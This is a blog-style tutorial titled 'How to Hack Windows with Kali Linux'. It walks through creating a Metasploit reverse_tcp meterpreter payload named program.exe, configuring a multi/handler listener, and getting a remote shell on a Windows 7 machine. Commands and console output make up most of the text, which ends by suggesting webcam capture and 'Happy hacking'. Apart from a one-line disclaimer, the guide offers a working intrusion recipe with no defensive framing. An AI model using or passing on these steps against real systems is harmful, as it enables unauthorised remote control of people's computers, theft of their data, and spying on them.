Quick Start Guide: How to Hack Windows with Kali Linux
Kali Linux is derived from Debian Linux and is mainly used for infiltration. It has over 300 penetration testing programs pre-installed. It is supported by the Metasploit Framework in the Metasploit project, a tool for developing and executing exploits. Let’s start by hacking Windows with Kali Linux. It is worth noting that we are writing this post for educational purposes only.
[*]
[*]Original machine details:
[*]Kali Linux
[email protected]:/# uname -a Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux [email protected]:/#
[*]
[*]Target machine used for hacking:
Windows 7 Ultimate SP1
[*]
[*]Step 1 … Load creation
[*]Payload is a program that is similar to a virus or a trojan that runs on a remote machine for the purpose of hacking. To create the payload, the commands written below are used, which will hack windows with Kali Linux…
[email protected]:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Final size of exe file: 73802 bytes Saved as: /root/program.exe [email protected]:/# ls -la /root/program.exe -rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
[*]
[*]We used the ls command to confirm that our Payload program was successfully created at the specified location.
[*]Step 2: Run the mfsconsole command, which will run an msf query.
[email protected]:# msfconsole .,,. . .$$$$$L..,,==aaccaacc%#s$b. d8, d8P d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p d888888P '7$$$$""""''^^`` .7$$$|D*"'``` ?88' d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88 .a#$$$$$$"` 88b d8P 88b`?8888P' ,s$$$$$$$"` 888888P' 88n _.,,,ass;: .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$' .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' _______________________________________________________________ ,&$$$$$$'_____ ll&&$$$$' .;;lll&&&&' ...;;lllll&' ......;;;llll;;;.... ` ......;;;;... . . Taking notes in notepad? Have Metasploit Pro track & report your progress and findings -- learn more on http://rapid7.com/metasploit =[ metasploit v4.12.22-dev ] + -- --=[ 1577 exploits - 906 auxiliary - 272 post ] + -- --=[ 455 payloads - 39 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >
[*]
[*]Step 3: For use, we used the following parts:
- Port 4444: you can use as your choice
- LHOST IP: IP 192.168.189.128 with Kali Linux. You can find out the IP that your machine is using using the Kali command.
[email protected]:/# ip r l 192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100 [email protected]:/#
[*]
[*]Now give the following command on the msf line “use exploit / multi / handler”
msf > use exploit/multi/handler msf exploit(handler) >
[*]
[*]Then issue the command “set payload windows / meterpreter / reverse_tcp” on the following line:
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
[*]
[*]Now set your local IP and port using lhost and lport command as shown below:
msf exploit(handler) > set lhost 192.168.189.128 lhost => 192.168.189.128 msf exploit(handler) > set lport 4444 lport => 4444
[*]
[*]and finally use the command.
msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.189.128:4444 [*] Starting the payload handler...
[*]
[*]Now you need to execute the command “program.exe” on the Windows machine, once it is executed on the target machine, you can be able to set up a meterpreter session. Just type SysInfo to get the details of the compromised Windows machine.
msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.189.128:4444 [*] Starting the payload handler... [*] Sending stage (957999 bytes) to 192.168.189.1 [*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000 meterpreter > sysinfo Computer : MANN-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_IN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32
[*]
[*]After you have successfully received the parts, you can do more in use or get more information with the command “help“Which will show all the options with which you can hack the system, for example, you can execute the webcam snap command“ webcam_snap ”in the same way as you can use many of the available options. Happy hacking !!!!